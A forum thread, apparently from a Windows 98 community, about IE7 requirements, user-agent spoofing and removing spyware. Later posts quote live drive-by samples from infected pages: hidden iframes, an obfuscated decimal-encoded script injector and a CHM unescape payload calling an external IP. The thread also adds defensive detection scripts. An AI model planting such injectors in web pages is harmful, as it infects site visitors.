
S.O.S. Internet Explorer 7.0 soon Required? S.O.S.


legacykeeper


I agree. M$ can't control all the websites and html is a worldwide standard which hasn't changed since IE4.0.

My opinion is that the only reason to require XP is to introduce a virus in your machine. I mean the only intentional reason because it can be simply poor programming in some script. That's why I recommend to write to the webmaster about that. He may be unaware of this bug.

You seem to forget Netscape, Firefox is not too far behind its destiny (nobody seems to learn). I choose to give the Opera guys a go.



Microsoft never enforced or encouraged this. It's a relic of the late nineties when sites would only work properly in one of the two dominating browsers... because they designed for one of the two.

You're in the confidence of Bill Gates, maybe?


I agree. M$ can't control all the websites and html is a worldwide standard which hasn't changed since IE4.0.

My opinion is that the only reason to require XP is to introduce a virus in your machine. I mean the only intentional reason because it can be simply poor programming in some script. That's why I recommend to write to the webmaster about that. He may be unaware of this bug.

For one this happens as a means to force people to upgrade to a newer OS and enrich MS I believe and for two you certainly can catch as many viruses, if not more, through IE with a 9x system than you can with an XP one. The advantage is that most won't execute on 9x once they are on your machine because they target NT specific stuff. But some do execute on 9x, including certain rootkits for which there are absolutely no removal tools unlike for the NT platform. I can pass you on some of them. I knew I had caught something but could not detect anything. Finally I scanned the memory for exes and dlls and found the path of two exes in my win dir. I could not see them with explorer nor with any third party tool including the tools I use to scan my dirs for new files or changes. They were in the run keys but I could only find them by opening the .dat files. Regedit or any other third party registry editor could not see their entries. Had to reboot with a startup disk and delete them with DOS. On reboot their run keys were then visible in regedit.

I think oscardog is right to consider ditching any version of IE altogether if that's what he means. Opera is pretty good but for some reason I don't manage to switch fully to it because I find my customized IE 5.5 perfect (besides not having tabs).

Edited by eidenk

You seem to forget Netscape, Firefox is not too far behind its destiny (nobody seems to learn)

What the hell?

You're in the confidence of Bill Gates, maybe?

Absolutely not. But not everything is M$' fault, you know. As I said, this is a relic of '98 which resulted because of webmaster stupidity and ignorance. Web standards weren't widely known back then, so people designed for one of the two dominating web browsers, and that was that. Some people today still don't get it and look at their website like an application they have to provide support for on different platforms, hence the "requires at least IE5.x" and "requires Windows XP" lines.

I find my customized IE 5.5 perfect (besides not having tabs).

IE 5.x is a web developer's nightmare. Wrong box model, no support for things like margin: auto; to center blocks, float bugs, etc. You may like your browser, but remember its web standards support is horrible.


Excuse me, sir, no offense, but you are a moron who obviously made opinions about things you have no clue whatsoever :)

Almost every sentence of your post is wrong or at best uninformed wrong assumption.

No need to go offensive, if he's uninformed, then inform him!

Anyway, no, installing a new browser like Firefox/Opera does not increase system complexity since it doesn't replace or conflict with IE. You only run it as any regular program when you want to surf the web and close it when you're done. And if you really like IE, then follow the techniques given to you in the previous post to spoof your "user-agent" (browser ID) and pretend you use IE7.

But I'll back up 98 Guy: what site says it "requires" IE7?


I have left my platform as Windows XP on my 98 partition, the only drawback that I have found is WindowsUpdate site doesn't function properly.

You should be able to put this registry change into a .REG file for both cases, and double-click the proper one for which user-agent string you want.

I have two reg files one puts the necessary info in and the other just removes it, I haven't used the one to remove, in a long time, because I have found no need to.

Edited by Steven W

I agree. M$ can't control all the websites and html is a worldwide standard which hasn't changed since IE4.0.

My opinion is that the only reason to require XP is to introduce a virus in your machine. I mean the only intentional reason because it can be simply poor programming in some script. That's why I recommend to write to the webmaster about that. He may be unaware of this bug.

For one this happens as a means to force people to upgrade to a newer OS and enrich MS I believe and for two you certainly can catch as many viruses, if not more, through IE with a 9x system than you can with an XP one. The advantage is that most won't execute on 9x once they are on your machine because they target NT specific stuff. But some do execute on 9x, including certain rootkits for which there are absolutely no removal tools unlike for the NT platform. I can pass you on some of them. I knew I had caught something but could not detect anything. Finally I scanned the memory for exes and dlls and found the path of two exes in my win dir. I could not see them with explorer nor with any third party tool including the tools I use to scan my dirs for new files or changes. They were in the run keys but I could only find them by opening the .dat files. Regedit or any other third party registry editor could not see their entries. Had to reboot with a startup disk and delete them with DOS. On reboot their run keys were then visible in regedit.

I think oscardog is right to consider ditching any version of IE altogether if that's what he means. Opera is pretty good but for some reason I don't manage to switch fully to it because I find my customized IE 5.5 perfect (besides not having tabs).

Well. You said there is no tool for spyware removal. You are wrong. DOS is a perfect tool for removing spyware. No windows based spyware can escape a DOS based and clean DOS running AV scanner.

Also, it is possible to check registry keys in DOS without GUI. I do have a script checking the registry "run" keys for new entries, every time computer is booting, on every 9x based computer I'm using.

As for the IE 5.5. This application should be considered as useless for internet browsing activity. It is much too unsafe. I found many web sites do have spyware downloaders attached, this year. I do believe someone found a way to automatically infect numerous poorly protected web sites. All of them were fitted with a java based downloader. I found, it is not possible to patch the IE 5.5 against those downloaders. IE 6 is also affected, but installation of all available patches solves the problem.


The question about which websites triggered the problem is excellent, and deserves the research from me to come up with answers. It's my negligence for not retrieving this info while it was fresh, I apologize. I have my MS History, and will keep it to answer the question.

The history is now 2 weeks old, so it's grouped only by week. I know the dates, 9/17 and 9/19. Is there a way to get MS History to display by order visited after the current day? Or how to correlate MS History files from another boot drive with the websites visited? I notice some pages I remember visiting not appearing. Notably, the MS update web page appearing after the errors is absent. I fear the same error that caused IE to close may also have caused the history function to fail. I've revisited every web page in the history for that week, without triggering any errors.

Edited by legacykeeper

Well. You said there is no tool for spyware removal. You are wrong. DOS is a perfect tool for removing spyware. No windows based spyware can escape a DOS based and clean DOS running AV scanner.

Granted if they are not zero day and the scanner is good enough.

Also, it is possible to check registry keys in DOS without GUI. I do have a script checking the registry "run" keys for new entries, every time computer is booting, on every 9x based computer I'm using.

Can you share it please ?

As for the IE 5.5. This application should be considered as useless for internet browsing activity. It is much too unsafe. I found many web sites do have spyware downloaders attached, this year. I do believe someone found a way to automatically infect numerous poorly protected web sites. All of them were fitted with a java based downloader. I found, it is not possible to patch the IE 5.5 against those downloaders. IE 6 is also affected, but installation of all available patches solves the problem.

Do you know which IE6 patch exactly offers protection against that and when it was issued ?

Because MS was not able to tell me when I contacted them about that. But maybe it was before they fixed it.

BTW can you tell me if this chm file wants to go on the internet with your fully patched IE6 runtime ?


Well the script is much more complicated, but the change detection part is like that:

ECHO REGEDIT4>reg
ECHO.>>reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>reg
ECHO.>>reg
REGEDIT /E reg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
FC /C reg HLM_run.reg|find "****">nul
if not errorlevel 1 Goto Change

where the HLM_run.reg file is a saved for future reference registry key.

Unfortunately, I do not know which particular update did the trick. I just installed all available at the microsoft update site, and it worked.

As for the .CHM file. When I'm clicking the link the IE asks what I want to do with it (open, save, cancel or more information).

Edited by Sfor
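The change-detection idea from the post above, taken one step further so that it names which Run values were added, removed or changed instead of only signalling that the export differs. This is an added example, not part of the original post or Sfor's script; it assumes both files are REGEDIT4 text exports with single-line values, and the sample exports are constructed.

```python
import re

RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
# "name"=data or @=data (default value); names may contain escaped quotes.
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')

def parse_reg(text):
    """Parse REGEDIT4 export text into {KEY_PATH: {value_name: raw_data}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            # Registry key paths are case-insensitive, so normalise them.
            current = keys.setdefault(line[1:-1].upper(), {})
        elif current is not None:
            m = VALUE_RE.match(line)
            if m:
                name = m.group(1)
                current[name if name == "@" else name[1:-1]] = m.group(2)
    return keys

def diff_key(baseline_text, current_text, key=RUN_KEY):
    """Report values added to, removed from, or changed under one key."""
    old = parse_reg(baseline_text).get(key.upper(), {})
    new = parse_reg(current_text).get(key.upper(), {})
    return {
        "added": {n: new[n] for n in new.keys() - old.keys()},
        "removed": {n: old[n] for n in old.keys() - new.keys()},
        "changed": {n: (old[n], new[n])
                    for n in old.keys() & new.keys() if old[n] != new[n]},
    }

# Constructed exports; the "winupd" entry and its path are made up for the demo.
BASELINE = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"ScanRegistry"="C:\\WINDOWS\\scanregw.exe /autorun"
'''
CURRENT = (BASELINE.replace("scanregw.exe /autorun", "scanregw.exe")
           + r'"winupd"="C:\\WINDOWS\\wupd32.exe"' + "\n")

if __name__ == "__main__":
    for kind, entries in diff_key(BASELINE, CURRENT).items():
        print(kind, entries)
```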

Well the script is much more complicated, but the change detection part is like that:
ECHO REGEDIT4>reg
ECHO.>>reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>reg
ECHO.>>reg
REGEDIT /E reg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
FC /C reg HLM_run.reg|find "****">nul
if not errorlevel 1 Goto Change

where the HLM_run.reg file is a saved for future reference registry key.

Thanks I'll look into it. It's interesting.

Unfortunately, I do not know which particular update did the trick. I just installed all available at the microsoft update site, and it worked.

Maybe you have an example, an infected webpage you did download or something like that ? Or a link to a webpage on which you'd get infected if you hadn't those updates installed.

As for the .CHM file. When I'm clicking the link the IE asks what I want to do with it (open, save, cancel or more information).

Obviously that's what IE asks you when you try to download a file.

But what happens when you run this file from your HDD was my question. Does HH.EXE try to connect on the Internet after you execute it ?


According to my router log, the CHM file makes a TCP connection with 81.95.146.98.

As for an infected site: http: // userjs.org /

At the end of the page code there is an IFrame link:

<iframe src="http://sunyiu.com/louisl/webimage/flash/index.php" width=1 height=1></iframe>

The trojan downloader code was downloaded from sunyiu.com by a link to adv522.htm file on some other server.

So everything was hidden as an advertisement. But, I saw other versions with a JS code added directly at the bottom of a page code.

<!-- o65 -->

<script language=JavaScript><!--

function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';

s+='060105102114097109101032115114099061039104116116112058047047098114098111100121046105110102111047

09';

s=s+'112097099107047105110100101120046112104112039032119105100116104061048032104101105103104116061048

32';

s=s+'102114097109101098111114100101114061039048039062060047105102114097109101062';

t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();

//--></SCRIPT>

<!-- c65 -->

Edited by Sfor

According to my router log, the CHM file makes a TCP connection with 81.95.146.98.

Bingo ! If you extract the CHM file you'll see that it contains one single html with the following javascript exploit code :

<script language=javascript> document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); </SCRIPT>

It seems you are vulnerable despite your IE6 updates. It seems also that MS did nothing to fix it. I forwarded this code to them in March of this year.

I am gonna have a look at your exploit now and see if I am vulnerable to it.

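A static check for the pattern shown in the last two posts: an iframe of 0 or 1 pixel, either written directly into the page or hidden inside a `document.write(unescape(...))` string or a run of three-digit decimal character codes. This is an added example, not code from the thread; it decodes strings as text without executing any script, assumes plain three-digit codes with no extra arithmetic, and runs on a constructed sample page whose hosts are placeholders.

```python
import re
from urllib.parse import unquote

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
UNESCAPE_RE = re.compile(r"""unescape\(\s*(['"])(.*?)\1""", re.S)
DIGITS_RE = re.compile(r"""(['"])(\d{12,})\1""")  # long all-digit string literals

def hidden_iframes(html):
    """Return the src of every iframe whose width or height is 0 or 1."""
    found = []
    for tag in IFRAME_RE.finditer(html):
        attrs = {n.lower(): dq or sq or bare
                 for n, dq, sq, bare in ATTR_RE.findall(tag.group(1))}
        if attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1"):
            found.append(attrs.get("src", ""))
    return found

def decode_layers(html):
    """Decode obfuscated string literals as text; no script is executed."""
    # JavaScript unescape() maps %XX to code point XX, i.e. Latin-1.
    layers = [unquote(m.group(2), encoding="latin-1")
              for m in UNESCAPE_RE.finditer(html)]
    # Decimal character codes, three digits each, possibly split over literals.
    digits = "".join(m.group(2) for m in DIGITS_RE.finditer(html))
    if digits:
        layers.append("".join(chr(int(digits[i:i + 3]))
                              for i in range(0, len(digits) - 2, 3)))
    return layers

def scan(html):
    """List (layer, src) for hidden iframes in the page and in decoded strings."""
    findings = [("plain", src) for src in hidden_iframes(html)]
    for layer in decode_layers(html):
        findings += [("decoded", src) for src in hidden_iframes(layer)]
    return findings

# Constructed sample page (hosts are placeholders, not taken from the thread).
_A = '<iframe src= http://a.example.invalid/index.html width="1" height="1"></iframe>'
_B = "<iframe src='http://b.example.invalid/x.php' width=0 height=0></iframe>"
_B3 = "".join("%03d" % ord(c) for c in _B)
SAMPLE = (
    '<p>news</p><iframe src="/video" width=640 height=360></iframe>'
    '<iframe src="http://c.example.invalid/ad.php" width=1 height=1></iframe>'
    "<script>document.write(unescape('"
    + "".join("%%%02X" % ord(c) for c in _A) + "'));</script>"
    "<script>var s='';s+='" + _B3[:99] + "';s+='" + _B3[99:] + "';</script>"
)

if __name__ == "__main__":
    for layer, src in scan(SAMPLE):
        print(layer, src)
```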
